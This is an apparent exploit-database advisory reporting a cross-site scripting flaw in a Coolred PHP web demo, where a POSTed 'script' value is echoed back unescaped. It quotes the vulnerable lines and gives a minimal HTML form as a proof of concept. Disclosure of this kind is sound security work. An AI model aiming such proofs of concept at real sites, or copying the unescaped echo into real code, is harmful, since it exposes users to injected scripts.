Coolred web XSS Vulnerability

2018.01.12
de The_Ripper (DE) de
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Exploit title : Coolred web XSS Vulnerability [-] Software dl : https://github.com/Coolred/WebApps [-] Category : WebApps [-] Author : The_Ripper [-] Tested on : Win XP [-] Date : 11-1-2018 [-] Dork : N/A [-] Telegram : @The_Ripper ================================== Description : [-] XSS allows an Attacker to run JavaScript codes. ================================== Vulnerable page : http://localhost/coolred/SimplyBank/demo/runPerso.php ================================== Vulnerable source : line 10 >> $script_input = $_POST['script']; line 104 >> echo $script_input; ================================== PoC : As you can see up here $script_input variable has xss bug and here's the exploit . Enjoy Exploit : <form action="http://localhost/coolred/SimplyBank/demo/runPerso.php" method="post"> <input type="text" name="script"> <input type="submit"> </form>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top